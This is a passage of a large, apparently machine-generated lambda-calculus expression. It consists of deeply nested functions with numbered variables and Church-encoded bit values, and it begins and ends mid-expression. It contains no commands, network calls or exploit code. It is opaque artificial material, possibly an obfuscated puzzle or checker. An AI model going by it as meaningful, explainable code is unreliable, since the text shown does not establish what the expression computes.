s_203 ((187)(203))(187))(((lambda s_16 lambda s_132 ((16)(132))(16))(((lambda s_33
lambda s_150 ((33)(150))(33))(((lambda s_86 lambda s_213 ((86)(213))(86))(((lambda
s_153 lambda s_71 ((153)(71))(153))(((lambda s_240 lambda s_19 ((240)(19))(240))
(((lambda s_197 lambda s_206 ((197)(206))(197))(((lambda s_186 lambda s_32 ((186)(32))
(186))(((lambda s_29 lambda s_130 ((29)(130))(29))(((lambda s_218 lambda s_111 ((218)
(111))(218))(((lambda s_150 lambda s_4 ((150)(4))(150))(((lambda s_169 lambda s_233
((169)(233))(169))(((lambda s_206 lambda s_135 ((206)(135))(206))(((lambda s_110 lambda
s_170 ((110)(170))(110))(((lambda s_105 lambda s_247 ((105)(247))(105))(((lambda s_98
lambda s_60 ((98)(60))(98))(((lambda s_249 lambda s_32 ((249)(32))(249))(((lambda s_143
lambda s_161 ((143)(161))(143))(((lambda s_9 lambda s_6 ((9)(6))(9))(((lambda s_4
lambda s_158 ((4)(158))(4))(((lambda s_219 lambda s_251 ((219)(251))(219))(((lambda
s_214 lambda s_59 ((214)(59))(214))(((lambda s_240 lambda s_32 ((240)(32))(240))
(((lambda s_248 lambda s_243 ((248)(243))(248))(((lambda s_39 lambda s_164 ((39)(164))
(39))(((lambda s_13 lambda s_196 ((13)(196))(13))(((lambda s_150 lambda s_151 ((150)
(151))(150))(((lambda s_26 lambda s_185 ((26)(185))(26))(((lambda s_234 lambda s_183
((234)(183))(234))(((lambda s_190 lambda s_127 ((190)(127))(190))(((lambda s_144 lambda
s_120 ((144)(120))(144))(((lambda s_187 lambda s_30 ((187)(30))(187))(((lambda s_121
lambda s_107 ((121)(107))(121))(((lambda s_103 lambda s_223 ((103)(223))(103))(((lambda
s_135 lambda s_80 ((135)(80))(135))(((lambda s_168 lambda s_227 ((168)(227))(168))
(((lambda s_94 lambda s_168 ((94)(168))(94))(((lambda s_243 lambda s_122 ((243)(122))
(243))(((lambda s_61 lambda s_43 ((61)(43))(61))(((lambda s_244 lambda s_69 ((244)(69))
(244))(((lambda s_244 lambda s_172 ((244)(172))(244))(((lambda s_22 lambda s_141 ((22)
(141))(22))(((lambda s_177 lambda s_194 ((177)(194))(177))(((lambda s_96 lambda s_136
((96)(136))(96))(((lambda s_128 lambda s_249 ((128)(249))(128))(((lambda s_222 lambda
s_20 ((222)(20))(222))(((lambda s_101 lambda s_93 ((101)(93))(101))(((lambda s_50
lambda s_254 ((50)(254))(50))(((lambda s_183 lambda s_210 ((183)(210))(183))(((lambda
s_124 lambda s_23 ((124)(23))(124))(((lambda s_161 lambda s_208 ((161)(208))(161))
(((lambda s_129 lambda s_246 ((129)(246))(129))(((lambda s_140 lambda s_109 ((140)
(109))(140))(((lambda s_119 lambda s_141 ((119)(141))(119))(((lambda s_250 lambda s_117
((250)(117))(250))(((lambda s_186 lambda s_183 ((186)(183))(186))(((lambda s_174 lambda
s_195 ((174)(195))(174))(((lambda s_107 lambda s_97 ((107)(97))(107))(((lambda s_130
lambda s_21 ((130)(21))(130))(((lambda s_163 lambda s_204 ((163)(204))(163))(((lambda
s_62 lambda s_6 ((62)(6))(62))(((lambda s_126 lambda s_153 ((126)(153))(126))(((lambda
s_88 lambda s_75 ((88)(75))(88))(((lambda s_129 lambda s_31 ((129)(31))(129))(((lambda
s_192 lambda s_88 ((192)(88))(192))(((lambda s_147 lambda s_11 ((147)(11))(147))
(((lambda s_189 lambda s_117 ((189)(117))(189))(((lambda s_134 lambda s_179 ((134)
(179))(134))(((lambda s_70 lambda s_87 ((70)(87))(70))(((lambda s_67 lambda s_144 ((67)
(144))(67))(((lambda s_111 lambda s_82 ((111)(82))(111))(((lambda s_4 lambda s_74 ((4)
(74))(4))(((lambda s_156 lambda s_239 ((156)(239))(156))(((lambda s_235 lambda s_39
((235)(39))(235))(((lambda s_90 lambda s_175 ((90)(175))(90))(((lambda s_157 lambda
s_164 ((157)(164))(157))(((lambda s_159 lambda s_180 ((159)(180))(159))(((lambda s_28
lambda s_209 ((28)(209))(28))(((lambda s_69 lambda s_108 ((69)(108))(69))(((lambda
s_121 lambda s_37 ((121)(37))(121))(((lambda s_119 lambda s_95 ((119)(95))(119))
(((lambda s_218 lambda s_99 ((218)(99))(218))(((lambda s_43 lambda s_188 ((43)(188))
(43))(((lambda s_87 lambda s_128 ((87)(128))(87))(((lambda s_150 lambda s_10 ((150)
(10))(150))(((lambda s_64 lambda s_22 ((64)(22))(64))(((lambda s_199 lambda s_170
((199)(170))(199))(((lambda s_70 lambda s_131 ((70)(131))(70))(((lambda s_41 lambda
s_175 ((41)(175))(41))(((lambda s_226 lambda s_94 ((226)(94))(226))(((lambda s_109
lambda s_247 ((109)(247))(109))(((lambda s_58 lambda s_227 ((58)(227))(58))(((lambda
s_130 lambda s_249 ((130)(249))(130))(((lambda s_31 lambda s_89 ((31)(89))(31))
(((lambda s_153 lambda s_148 ((153)(148))(153))(((lambda s_176 lambda s_199 ((176)
(199))(176))(((lambda s_16 lambda s_200 ((16)(200))(16))(((lambda s_197 lambda s_203
((197)(203))(197))(((lambda s_210 lambda s_220 ((210)(220))(210))(((lambda s_123 lambda
s_219 ((123)(219))(123))(((lambda s_185 lambda s_142 ((185)(142))(185))(((lambda s_121
lambda s_29 ((121)(29))(121))(((lambda s_202 lambda s_187 ((202)(187))(202))(((lambda
s_159 lambda s_218 ((159)(218))(159))(((lambda s_190 lambda s_24 ((190)(24))(190))
(((lambda s_108 lambda s_231 ((108)(231))(108))(((lambda s_86 lambda s_157 ((86)(157))
(86))(((lambda s_243 lambda s_56 ((243)(56))(243))(((lambda s_7 lambda s_155 ((7)(155))
(7))(((lambda s_240 lambda s_124 ((240)(124))(240))(((lambda s_212 lambda s_143 ((212)
(143))(212))(((lambda s_199 lambda s_161 ((199)(161))(199))(((lambda s_149 lambda s_176
((149)(176))(149))(((lambda s_233 lambda s_49 ((233)(49))(233))(((lambda s_29 lambda
s_22 ((29)(22))(29))(((lambda s_28 lambda s_89 ((28)(89))(28))(((lambda s_16 lambda
s_80 ((16)(80))(16))(((lambda s_254 lambda s_220 ((254)(220))(254))(((lambda s_227
lambda s_83 ((227)(83))(227))(((lambda s_248 lambda s_212 ((248)(212))(248))(((lambda
s_25 lambda s_164 ((25)(164))(25))(((lambda s_12 lambda s_21 ((12)(21))(12))(((lambda
s_24 lambda s_6 ((24)(6))(24))(((lambda s_151 lambda s_250 ((151)(250))(151))(((lambda
s_74 lambda s_102 ((74)(102))(74))(((lambda s_132 lambda s_119 ((132)(119))(132))
(((lambda s_249 lambda s_233 ((249)(233))(249))(((lambda s_242 lambda s_139 ((242)
(139))(242))(((lambda s_75 lambda s_185 ((75)(185))(75))(((lambda s_142 lambda s_249
((142)(249))(142))(((lambda s_154 lambda s_251 ((154)(251))(154))(((lambda s_125 lambda
s_67 ((125)(67))(125))(((lambda s_43 lambda s_196 ((43)(196))(43))(((lambda s_187
lambda s_22 ((187)(22))(187))(((lambda s_210 lambda s_233 ((210)(233))(210))(((lambda
s_27 lambda s_127 ((27)(127))(27))(((lambda s_239 lambda s_7 ((239)(7))(239))(((lambda
s_85 lambda s_193 ((85)(193))(85))(((lambda s_120 lambda s_124 ((120)(124))(120))
(((lambda s_225 lambda s_121 ((225)(121))(225))(((lambda s_153 lambda s_4 ((153)(4))
(153))(((lambda s_76 lambda s_11 ((76)(11))(76))(((lambda s_34 lambda s_189 ((34)(189))
(34))(((lambda s_221 lambda s_81 ((221)(81))(221))(((lambda s_90 lambda s_42 ((90)(42))
(90))(((lambda s_30 lambda s_94 ((30)(94))(30))(((lambda s_125 lambda s_156 ((125)
(156))(125))(((lambda s_148 lambda s_235 ((148)(235))(148))(((lambda s_104 lambda s_176
((104)(176))(104))(((lambda s_229 lambda s_46 ((229)(46))(229))(((lambda s_182 lambda
s_118 ((182)(118))(182))(((lambda s_138 lambda s_104 ((138)(104))(138))(((lambda s_83
lambda s_38 ((83)(38))(83))(((lambda s_183 lambda s_71 ((183)(71))(183))(((lambda s_113
lambda s_32 ((113)(32))(113))(((lambda s_186 lambda s_194 ((186)(194))(186))(((lambda
s_240 lambda s_144 ((240)(144))(240))(((lambda s_224 lambda s_231 ((224)(231))(224))
(((lambda s_46 lambda s_155 ((46)(155))(46))(((lambda s_73 lambda s_150 ((73)(150))
(73))(((lambda s_125 lambda s_86 ((125)(86))(125))(((lambda s_242 lambda s_118 ((242)
(118))(242))(((lambda s_89 lambda s_135 ((89)(135))(89))(((lambda s_253 lambda s_59
((253)(59))(253))(((lambda s_13 lambda s_153 ((13)(153))(13))(((lambda s_148 lambda
s_60 ((148)(60))(148))(((lambda s_76 lambda s_69 ((76)(69))(76))(((lambda s_44 lambda
s_244 ((44)(244))(44))(((lambda s_222 lambda s_172 ((222)(172))(222))(((lambda s_239
lambda s_7 ((239)(7))(239))(((lambda s_167 lambda s_154 ((167)(154))(167))(((lambda s_9
lambda s_79 ((9)(79))(9))(((lambda s_11 lambda s_149 ((11)(149))(11))(((lambda s_24
lambda s_128 ((24)(128))(24))(((lambda s_162 lambda s_21 ((162)(21))(162))(((lambda
s_228 lambda s_95 ((228)(95))(228))(((lambda s_60 lambda s_58 ((60)(58))(60))(((lambda
s_249 lambda s_122 ((249)(122))(249))(((lambda s_189 lambda s_114 ((189)(114))(189))
(((lambda s_108 lambda s_85 ((108)(85))(108))(((lambda s_65 lambda s_81 ((65)(81))(65))
(((lambda s_1 lambda s_63 ((1)(63))(1))(((lambda s_93 lambda s_70 ((93)(70))(93))
(((lambda s_181 lambda s_188 ((181)(188))(181))(((lambda s_77 lambda s_59 ((77)(59))
(77))(((lambda s_39 lambda s_95 ((39)(95))(39))(((lambda s_119 lambda s_166 ((119)
(166))(119))(((lambda s_44 lambda s_253 ((44)(253))(44))(((lambda s_188 lambda s_29
((188)(29))(188))(((lambda s_251 lambda s_144 ((251)(144))(251))(((lambda s_213 lambda
s_104 ((213)(104))(213))(((lambda s_105 lambda s_28 ((105)(28))(105))(((lambda s_226
lambda s_70 ((226)(70))(226))(((lambda s_175 lambda s_245 ((175)(245))(175))(((lambda
s_101 lambda s_41 ((101)(41))(101))(((lambda s_55 lambda s_20 ((55)(20))(55))(((lambda
s_124 lambda s_53 ((124)(53))(124))(((lambda s_103 lambda s_154 ((103)(154))(103))
(((lambda s_14 lambda s_225 ((14)(225))(14))(((lambda s_163 lambda s_4 ((163)(4))(163))
(((lambda s_142 lambda s_45 ((142)(45))(142))(((lambda s_55 lambda s_186 ((55)(186))
(55))(((lambda s_171 lambda s_186 ((171)(186))(171))(((lambda s_161 lambda s_216 ((161)
(216))(161))(((lambda s_5 lambda s_195 ((5)(195))(5))(((lambda s_11 lambda s_39 ((11)
(39))(11))(((lambda s_183 lambda s_223 ((183)(223))(183))(((lambda s_247 lambda s_21
((247)(21))(247))(((lambda s_233 lambda s_166 ((233)(166))(233))(((lambda s_231 lambda
s_129 ((231)(129))(231))(((lambda s_108 lambda s_211 ((108)(211))(108))(((lambda s_180
lambda s_106 ((180)(106))(180))(((lambda s_82 lambda s_205 ((82)(205))(82))(((lambda
s_89 lambda s_146 ((89)(146))(89))(((lambda s_152 lambda s_162 ((152)(162))(152))
(((lambda s_171 lambda s_140 ((171)(140))(171))(((lambda s_192 lambda s_244 ((192)
(244))(192))(((lambda s_79 lambda s_78 ((79)(78))(79))(((lambda s_126 lambda s_68
((126)(68))(126))(((lambda s_75 lambda s_143 ((75)(143))(75))(((lambda s_78 lambda
s_175 ((78)(175))(78))(((lambda s_168 lambda s_111 ((168)(111))(168))(((lambda s_234
lambda s_180 ((234)(180))(234))(((lambda s_135 lambda s_49 ((135)(49))(135))(((lambda
s_17 lambda s_222 ((17)(222))(17))(((lambda s_179 lambda s_136 ((179)(136))(179))
(((lambda s_138 lambda s_202 ((138)(202))(138))(((lambda s_97 lambda s_31 ((97)(31))
(97))(((lambda s_139 lambda s_130 ((139)(130))(139))(((lambda s_207 lambda s_197 ((207)
(197))(207))(((lambda s_190 lambda s_151 ((190)(151))(190))(((lambda s_228 lambda s_16
((228)(16))(228))(((lambda s_171 lambda s_233 ((171)(233))(171))(((lambda s_148 lambda
s_161 ((148)(161))(148))(((lambda s_140 lambda s_53 ((140)(53))(140))(((lambda s_121
lambda s_183 ((121)(183))(121))(((lambda s_74 lambda s_248 ((74)(248))(74))(((lambda
s_126 lambda s_165 ((126)(165))(126))(((lambda s_32 lambda s_178 ((32)(178))(32))
(((lambda s_28 lambda s_97 ((28)(97))(28))(((lambda s_235 lambda s_39 ((235)(39))(235))
(((lambda s_210 lambda s_243 ((210)(243))(210))(((lambda s_97 lambda s_23 ((97)(23))
(97))(((lambda s_60 lambda s_137 ((60)(137))(60))(((lambda s_60 lambda s_141 ((60)
(141))(60))(((lambda s_172 lambda s_113 ((172)(113))(172))(((lambda s_217 lambda s_195
((217)(195))(217))(((lambda s_93 lambda s_174 ((93)(174))(93))(((lambda s_215 lambda
s_119 ((215)(119))(215))(((lambda s_168 lambda s_169 ((168)(169))(168))(((lambda s_90
lambda s_141 ((90)(141))(90))(((lambda s_182 lambda s_169 ((182)(169))(182))(((lambda
s_32 lambda s_70 ((32)(70))(32))(((lambda s_44 lambda s_21 ((44)(21))(44))(((lambda
s_36 lambda s_121 ((36)(121))(36))(((lambda s_2 lambda s_123 ((2)(123))(2))(((lambda
s_201 lambda s_183 ((201)(183))(201))(((lambda s_253 lambda s_70 ((253)(70))(253))
(((lambda s_144 lambda s_6 ((144)(6))(144))(((lambda s_143 lambda s_63 ((143)(63))
(143))(((lambda s_187 lambda s_221 ((187)(221))(187))(((lambda s_128 lambda s_17 ((128)
(17))(128))(((lambda s_243 lambda s_37 ((243)(37))(243))(((lambda s_173 lambda s_214
((173)(214))(173))(((lambda s_111 lambda s_253 ((111)(253))(111))(((lambda s_110 lambda
s_177 ((110)(177))(110))(((lambda s_52 lambda s_216 ((52)(216))(52))(((lambda s_129
lambda s_113 ((129)(113))(129))(((lambda s_218 lambda s_151 ((218)(151))(218))(((lambda
s_47 lambda s_107 ((47)(107))(47))(((lambda s_221 lambda s_203 ((221)(203))(221))
(((lambda s_145 lambda s_61 ((145)(61))(145))(((lambda s_29 lambda s_34 ((29)(34))(29))
(((lambda s_152 lambda s_3 ((152)(3))(152))(((lambda s_246 lambda s_15 ((246)(15))
(246))(((lambda s_157 lambda s_141 ((157)(141))(157))(((lambda s_131 lambda s_249
((131)(249))(131))(((lambda s_59 lambda s_151 ((59)(151))(59))(((lambda s_162 lambda
s_226 ((162)(226))(162))(((lambda s_4 lambda s_249 ((4)(249))(4))(((lambda s_202 lambda
s_180 ((202)(180))(202))(((lambda s_79 lambda s_224 ((79)(224))(79))(((lambda s_49
lambda s_135 ((49)(135))(49))(((lambda s_46 lambda s_189 ((46)(189))(46))(((lambda
s_177 lambda s_132 ((177)(132))(177))(((lambda s_250 lambda s_5 ((250)(5))(250))
(((lambda s_115 lambda s_217 ((115)(217))(115))(((lambda s_96 lambda s_210 ((96)(210))
(96))(((lambda s_20 lambda s_52 ((20)(52))(20))(((lambda s_78 lambda s_57 ((78)(57))
(78))(((lambda s_1 lambda s_236 ((1)(236))(1))(((lambda s_50 lambda s_140 ((50)(140))
(50))(((lambda s_122 lambda s_94 ((122)(94))(122))(((lambda s_19 lambda s_219 ((19)
(219))(19))(((lambda s_119 lambda s_141 ((119)(141))(119))(((lambda s_83 lambda s_114
((83)(114))(83))(((lambda s_97 lambda s_27 ((97)(27))(97))(((lambda s_134 lambda s_45
((134)(45))(134))(((lambda s_212 lambda s_103 ((212)(103))(212))(((lambda s_91 lambda
s_12 ((91)(12))(91))(((lambda s_155 lambda s_43 ((155)(43))(155))(((lambda s_253 lambda
s_243 ((253)(243))(253))(((lambda s_27 lambda s_47 ((27)(47))(27))(((lambda s_224
lambda s_104 ((224)(104))(224))(((lambda s_67 lambda s_174 ((67)(174))(67))(((lambda
s_119 lambda s_220 ((119)(220))(119))(((lambda s_165 lambda s_5 ((165)(5))(165))
(((lambda s_12 lambda s_77 ((12)(77))(12))(((lambda s_156 lambda s_170 ((156)(170))
(156))(((lambda s_198 lambda s_229 ((198)(229))(198))(((lambda s_15 lambda s_56 ((15)
(56))(15))(((lambda s_104 lambda s_79 ((104)(79))(104))(((lambda s_86 lambda s_98 ((86)
(98))(86))(((lambda s_60 lambda s_66 ((60)(66))(60))(((lambda s_123 lambda s_252 ((123)
(252))(123))(((lambda s_140 lambda s_118 ((140)(118))(140))(((lambda s_124 lambda s_44
((124)(44))(124))(((lambda s_79 lambda s_147 ((79)(147))(79))(((lambda s_229 lambda
s_91 ((229)(91))(229))(((lambda s_119 lambda s_252 ((119)(252))(119))(((lambda s_84
lambda s_83 ((84)(83))(84))(((lambda s_153 lambda s_14 ((153)(14))(153))(((lambda s_212
lambda s_82 ((212)(82))(212))(((lambda s_112 lambda s_22 ((112)(22))(112))(((lambda
s_186 lambda s_63 ((186)(63))(186))(((lambda s_106 lambda s_31 ((106)(31))(106))(lambda
s_39 lambda s_65 39))(((lambda s_152 lambda s_157 ((lambda s_117 lambda s_220 ((117)
(117))(220))(((lambda s_154 lambda s_224 ((154)(224))(154))(157))((lambda s_81 lambda
s_222 lambda s_66 ((81)(66))(222))(152))))(((lambda s_158 lambda s_201 ((158)(201))
(158))((lambda s_171 lambda s_163 lambda s_113 ((171)(113))(163))(157)))(152)))(lambda
s_1 lambda s_0 0))(lambda s_115 lambda s_245 115))))(((lambda s_106 lambda s_153
((lambda s_162 lambda s_187 ((162)(162))(187))(((lambda s_28 lambda s_184 ((28)(184))
(28))(153))((lambda s_158 lambda s_222 lambda s_29 ((158)(29))(222))(106))))(((lambda
s_248 lambda s_217 ((248)(217))(248))((lambda s_234 lambda s_6 lambda s_82 ((234)(82))
(6))(153)))(106)))(lambda s_1 lambda s_0 0))(lambda s_16 lambda s_113 16))))(((lambda
s_104 lambda s_111 ((lambda s_8 lambda s_189 ((8)(8))(189))(((lambda s_220 lambda s_250
((220)(250))(220))(111))((lambda s_111 lambda s_251 lambda s_146 ((111)(146))(251))
(104))))(((lambda s_19 lambda s_228 ((19)(228))(19))((lambda s_251 lambda s_146 lambda
s_226 ((251)(226))(146))(111)))(104)))(lambda s_0 lambda s_1 0))(lambda s_164 lambda
s_35 35))))(((lambda s_231 lambda s_121 ((lambda s_50 lambda s_79 ((50)(50))(79))
(((lambda s_218 lambda s_74 ((218)(74))(218))(121))((lambda s_201 lambda s_214 lambda
s_107 ((201)(107))(214))(231))))(((lambda s_49 lambda s_169 ((49)(169))(49))((lambda
s_238 lambda s_52 lambda s_40 ((238)(40))(52))(121)))(231)))(lambda s_1 lambda s_0 1))
(lambda s_168 lambda s_97 97))))(((lambda s_47 lambda s_162 ((lambda s_73 lambda s_120
((73)(73))(120))(((lambda s_118 lambda s_228 ((118)(228))(118))(162))((lambda s_223
lambda s_115 lambda s_157 ((223)(157))(115))(47))))(((lambda s_130 lambda s_185 ((130)
(185))(130))((lambda s_133 lambda s_29 lambda s_211 ((133)(211))(29))(162)))(47)))
(lambda s_0 lambda s_1 1))(lambda s_45 lambda s_38 45))))(((lambda s_228 lambda s_90
((lambda s_5 lambda s_51 ((5)(5))(51))(((lambda s_71 lambda s_209 ((71)(209))(71))(90))
((lambda s_215 lambda s_91 lambda s_255 ((215)(255))(91))(228))))(((lambda s_118 lambda
s_44 ((118)(44))(118))((lambda s_189 lambda s_28 lambda s_76 ((189)(76))(28))(90)))
(228)))(lambda s_0 lambda s_1 0))(lambda s_28 lambda s_147 147))))(((lambda s_252
lambda s_1 ((lambda s_156 lambda s_164 ((156)(156))(164))(((lambda s_178 lambda s_183
((178)(183))(178))(1))((lambda s_51 lambda s_27 lambda s_72 ((51)(72))(27))(252))))
(((lambda s_247 lambda s_99 ((247)(99))(247))((lambda s_137 lambda s_165 lambda s_132
((137)(132))(165))(1)))(252)))(lambda s_0 lambda s_1 1))(lambda s_75 lambda s_5 75))))
(((lambda s_155 lambda s_1 ((lambda s_165 lambda s_153 ((165)(165))(153))(((lambda
s_140 lambda s_207 ((140)(207))(140))(1))((lambda s_9 lambda s_189 lambda s_65 ((9)
(65))(189))(155))))(((lambda s_65 lambda s_173 ((65)(173))(65))((lambda s_170 lambda
s_81 lambda s_148 ((170)(148))(81))(1)))(155)))(lambda s_1 lambda s_0 0))(lambda s_210
lambda s_60 210))))(((lambda s_123 lambda s_189 ((lambda s_154 lambda s_10 ((154)(154))
(10))(((lambda s_63 lambda s_18 ((63)(18))(63))(189))((lambda s_69 lambda s_221 lambda
s_167 ((69)(167))(221))(123))))(((lambda s_22 lambda s_119 ((22)(119))(22))((lambda
s_242 lambda s_26 lambda s_41 ((242)(41))(26))(189)))(123)))(lambda s_1 lambda s_0 1))
(lambda s_204 lambda s_152 152))))(((lambda s_134 lambda s_33 ((lambda s_63 lambda s_94
((63)(63))(94))(((lambda s_26 lambda s_43 ((26)(43))(26))(33))((lambda s_80 lambda s_57
lambda s_8 ((80)(8))(57))(134))))(((lambda s_121 lambda s_114 ((121)(114))(121))
((lambda s_133 lambda s_255 lambda s_62 ((133)(62))(255))(33)))(134)))(lambda s_1
lambda s_0 1))(lambda s_105 lambda s_106 106))))(((lambda s_87 lambda s_244 ((lambda
s_255 lambda s_253 ((255)(255))(253))(((lambda s_130 lambda s_61 ((130)(61))(130))
(244))((lambda s_40 lambda s_5 lambda s_231 ((40)(231))(5))(87))))(((lambda s_58 lambda
s_26 ((58)(26))(58))((lambda s_92 lambda s_37 lambda s_20 ((92)(20))(37))(244)))(87)))
(lambda s_0 lambda s_1 0))(lambda s_193 lambda s_222 222))))(((lambda s_65 lambda s_151
((lambda s_130 lambda s_123 ((130)(130))(123))(((lambda s_243 lambda s_66 ((243)(66))
(243))(151))((lambda s_56 lambda s_144 lambda s_199 ((56)(199))(144))(65))))(((lambda
s_60 lambda s_227 ((60)(227))(60))((lambda s_30 lambda s_140 lambda s_5 ((30)(5))(140))
(151)))(65)))(lambda s_1 lambda s_0 0))(lambda s_112 lambda s_228 112))))(((lambda
s_127 lambda s_77 ((lambda s_64 lambda s_143 ((64)(64))(143))(((lambda s_164 lambda
s_48 ((164)(48))(164))(77))((lambda s_188 lambda s_127 lambda s_24 ((188)(24))(127))
(127))))(((lambda s_102 lambda s_150 ((102)(150))(102))((lambda s_146 lambda s_90
lambda s_124 ((146)(124))(90))(77)))(127)))(lambda s_0 lambda s_1 0))(lambda s_75
lambda s_21 21))))(((lambda s_207 lambda s_181 ((lambda s_246 lambda s_206 ((246)(246))
(206))(((lambda s_249 lambda s_248 ((249)(248))(249))(181))((lambda s_40 lambda s_222
lambda s_210 ((40)(210))(222))(207))))(((lambda s_52 lambda s_142 ((52)(142))(52))
((lambda s_169 lambda s_109 lambda s_198 ((169)(198))(109))(181)))(207)))(lambda s_1
lambda s_0 0))(lambda s_47 lambda s_88 47))))(((lambda s_57 lambda s_13 ((lambda s_219
lambda s_119 ((219)(219))(119))(((lambda s_99 lambda s_52 ((99)(52))(99))(13))((lambda
s_64 lambda s_151 lambda s_27 ((64)(27))(151))(57))))(((lambda s_237 lambda s_250
((237)(250))(237))((lambda s_30 lambda s_146 lambda s_174 ((30)(174))(146))(13)))(57)))
(lambda s_1 lambda s_0 1))(lambda s_222 lambda s_87 87))))(((lambda s_100 lambda s_92
((lambda s_70 lambda s_150 ((70)(70))(150))(((lambda s_172 lambda s_211 ((172)(211))
(172))(92))((lambda s_202 lambda s_214 lambda s_114 ((202)(114))(214))(100))))(((lambda
s_250 lambda s_247 ((250)(247))(250))((lambda s_176 lambda s_50 lambda s_39 ((176)(39))
(50))(92)))(100)))(lambda s_0 lambda s_1 0))(lambda s_40 lambda s_236 236))))(((lambda
s_81 lambda s_195 ((lambda s_185 lambda s_67 ((185)(185))(67))(((lambda s_94 lambda
s_60 ((94)(60))(94))(195))((lambda s_39 lambda s_6 lambda s_199 ((39)(199))(6))(81))))
(((lambda s_54 lambda s_142 ((54)(142))(54))((lambda s_24 lambda s_247 lambda s_138
((24)(138))(247))(195)))(81)))(lambda s_0 lambda s_1 0))(lambda s_188 lambda s_223
223))))(((lambda s_60 lambda s_226 ((lambda s_255 lambda s_237 ((255)(255))(237))
(((lambda s_77 lambda s_85 ((77)(85))(77))(226))((lambda s_166 lambda s_181 lambda
s_197 ((166)(197))(181))(60))))(((lambda s_21 lambda s_33 ((21)(33))(21))((lambda s_1
lambda s_80 lambda s_68 ((1)(68))(80))(226)))(60)))(lambda s_0 lambda s_1 0))(lambda
s_118 lambda s_201 201))))(((lambda s_202 lambda s_69 ((lambda s_154 lambda s_23 ((154)
(154))(23))(((lambda s_42 lambda s_73 ((42)(73))(42))(69))((lambda s_65 lambda s_147
lambda s_249 ((65)(249))(147))(202))))(((lambda s_7 lambda s_229 ((7)(229))(7))((lambda
s_63 lambda s_141 lambda s_218 ((63)(218))(141))(69)))(202)))(lambda s_1 lambda s_0 1))
(lambda s_158 lambda s_167 167))))(((lambda s_111 lambda s_235 ((lambda s_242 lambda
s_221 ((242)(242))(221))(((lambda s_15 lambda s_166 ((15)(166))(15))(235))((lambda
s_166 lambda s_243 lambda s_227 ((166)(227))(243))(111))))(((lambda s_2 lambda s_194
((2)(194))(2))((lambda s_183 lambda s_98 lambda s_159 ((183)(159))(98))(235)))(111)))
(lambda s_0 lambda s_1 0))(lambda s_240 lambda s_107 107))))(((lambda s_91 lambda s_221
((lambda s_84 lambda s_96 ((84)(84))(96))(((lambda s_92 lambda s_8 ((92)(8))(92))(221))
((lambda s_168 lambda s_238 lambda s_76 ((168)(76))(238))(91))))(((lambda s_215 lambda
s_114 ((215)(114))(215))((lambda s_111 lambda s_84 lambda s_126 ((111)(126))(84))
(221)))(91)))(lambda s_0 lambda s_1 1))(lambda s_154 lambda s_99 154))))(((lambda s_138
lambda s_239 ((lambda s_65 lambda s_96 ((65)(65))(96))(((lambda s_19 lambda s_194 ((19)
(194))(19))(239))((lambda s_173 lambda s_195 lambda s_205 ((173)(205))(195))(138))))
(((lambda s_141 lambda s_147 ((141)(147))(141))((lambda s_114 lambda s_239 lambda s_155
((114)(155))(239))(239)))(138)))(lambda s_1 lambda s_0 0))(lambda s_185 lambda s_94
185))))(((lambda s_242 lambda s_36 ((lambda s_49 lambda s_229 ((49)(49))(229))(((lambda
s_40 lambda s_156 ((40)(156))(40))(36))((lambda s_148 lambda s_57 lambda s_34 ((148)
(34))(57))(242))))(((lambda s_232 lambda s_19 ((232)(19))(232))((lambda s_127 lambda
s_194 lambda s_237 ((127)(237))(194))(36)))(242)))(lambda s_0 lambda s_1 1))(lambda
s_129 lambda s_49 129))))(((lambda s_131 lambda s_235 ((lambda s_176 lambda s_182
((176)(176))(182))(((lambda s_109 lambda s_140 ((109)(140))(109))(235))((lambda s_165
lambda s_90 lambda s_163 ((165)(163))(90))(131))))(((lambda s_53 lambda s_223 ((53)
(223))(53))((lambda s_211 lambda s_32 lambda s_182 ((211)(182))(32))(235)))(131)))
(lambda s_1 lambda s_0 0))(lambda s_176 lambda s_200 176))))(((lambda s_132 lambda
s_203 ((lambda s_136 lambda s_144 ((136)(136))(144))(((lambda s_112 lambda s_156 ((112)
(156))(112))(203))((lambda s_54 lambda s_230 lambda s_119 ((54)(119))(230))(132))))
(((lambda s_224 lambda s_22 ((224)(22))(224))((lambda s_166 lambda s_201 lambda s_253
((166)(253))(201))(203)))(132)))(lambda s_1 lambda s_0 0))(lambda s_112 lambda s_98
112))))(((lambda s_52 lambda s_211 ((lambda s_16 lambda s_121 ((16)(16))(121))(((lambda
s_74 lambda s_10 ((74)(10))(74))(211))((lambda s_241 lambda s_170 lambda s_74 ((241)
(74))(170))(52))))(((lambda s_168 lambda s_113 ((168)(113))(168))((lambda s_132 lambda
s_27 lambda s_64 ((132)(64))(27))(211)))(52)))(lambda s_1 lambda s_0 1))(lambda s_119
lambda s_37 37))))(((lambda s_130 lambda s_187 ((lambda s_135 lambda s_227 ((135)(135))
(227))(((lambda s_145 lambda s_73 ((145)(73))(145))(187))((lambda s_30 lambda s_152
lambda s_88 ((30)(88))(152))(130))))(((lambda s_127 lambda s_122 ((127)(122))(127))
((lambda s_223 lambda s_220 lambda s_78 ((223)(78))(220))(187)))(130)))(lambda s_1
lambda s_0 1))(lambda s_131 lambda s_63 63))))(((lambda s_9 lambda s_12 ((lambda s_255
lambda s_48 ((255)(255))(48))(((lambda s_33 lambda s_14 ((33)(14))(33))(12))((lambda
s_83 lambda s_207 lambda s_236 ((83)(236))(207))(9))))(((lambda s_71 lambda s_47 ((71)
(47))(71))((lambda s_249 lambda s_189 lambda s_80 ((249)(80))(189))(12)))(9)))(lambda
s_1 lambda s_0 0))(lambda s_215 lambda s_8 215))))(((lambda s_50 lambda s_102 ((lambda
s_116 lambda s_11 ((116)(116))(11))(((lambda s_59 lambda s_20 ((59)(20))(59))(102))
((lambda s_74 lambda s_62 lambda s_63 ((74)(63))(62))(50))))(((lambda s_168 lambda
s_152 ((168)(152))(168))((lambda s_99 lambda s_36 lambda s_58 ((99)(58))(36))(102)))
(50)))(lambda s_1 lambda s_0 0))(lambda s_3 lambda s_255 3))))(((lambda s_61 lambda
s_227 ((lambda s_72 lambda s_190 ((72)(72))(190))(((lambda s_63 lambda s_36 ((63)(36))
(63))(227))((lambda s_103 lambda s_203 lambda s_196 ((103)(196))(203))(61))))(((lambda
s_224 lambda s_241 ((224)(241))(224))((lambda s_206 lambda s_71 lambda s_138 ((206)
(138))(71))(227)))(61)))(lambda s_1 lambda s_0 0))(lambda s_193 lambda s_68 193))))
(((lambda s_113 lambda s_8 ((lambda s_155 lambda s_245 ((155)(155))(245))(((lambda s_38
